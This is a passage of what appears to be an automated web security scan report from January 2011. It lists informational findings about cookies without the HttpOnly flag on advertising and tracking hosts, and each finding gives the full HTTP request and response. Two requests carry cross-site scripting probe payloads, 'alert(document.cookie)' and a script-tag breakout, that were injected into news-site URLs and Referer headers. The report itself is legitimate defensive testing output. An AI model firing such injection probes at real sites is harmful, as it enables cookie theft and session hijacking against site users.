Vary: User-Agent,Accept-Encoding
Content-Length: 26257

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401349",Location:CO
...[SNIP]...

11.225. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p83612734&PRAd=57555319&AR_C=39967551 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=10&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 21:57:55 2011&prad=58087444&arc=40400763&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296251875%2E953%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 22:52:05 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; expires=Thu 28-Apr-2011 22:52:05 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24910

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"57555319",Pid:"p83612734",Arc:"39967551",Location:CO
...[SNIP]...

11.226. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://au.track.decideinteractive.com
Path:   /n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c HTTP/1.1
Host: au.track.decideinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 14:12:05 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Fri, 28 Jan 2011 14:12:05 GMT
location: http://www.247realmedia.com
Set-Cookie: id=9272912264837465719; expires=Sat, 28-Jan-2012 14:12:05 GMT; path=/; domain=.decideinteractive.com;
Set-Cookie: name=9272912264820689035; path=/; domain=.decideinteractive.com;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


11.227. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6135404&rn=534961991&c7=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&c3=15&c4=7477&c10=3182236&c8=Page%20Not%20Found&c9=http%3A%2F%2Fburp%2Fshow%2F4&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 28 Jan 2011 14:14:32 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sun, 27-Jan-2013 14:14:32 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.228. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035740&d.c=gif&d.o=desoundings&d.x=31314505&d.t=page&d.u=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Fmishaps-a-rescues%2F272642-mishaps-a-rescues-connecticut-and-new-york-jan%3F%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x00241B%29%253C%2Fscript%253E HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Fri, 28 Jan 2011 15:00:13 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sun, 27-Jan-2013 15:00:13 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.229. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 515
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="ATTWL=CollectiveB3;expires="+B3d.toGMTString()+";pa
...[SNIP]...

11.230. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]/2045287019/x90//default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SRC="
...[SNIP]...

11.231. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90?http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543^950189^81^0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda
...[SNIP]...

11.232. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2667
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/63904
...[SNIP]...

11.233. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90?http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541^950190^81^0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca
...[SNIP]...

11.234. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570
...[SNIP]...

11.235. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 23:08:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f
...[SNIP]...

11.236. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2667
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/60124
...[SNIP]...

11.237. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:10:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2
...[SNIP]...

11.238. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:32:01 GMT
Server: Apache/2.0.52 (Red Hat)
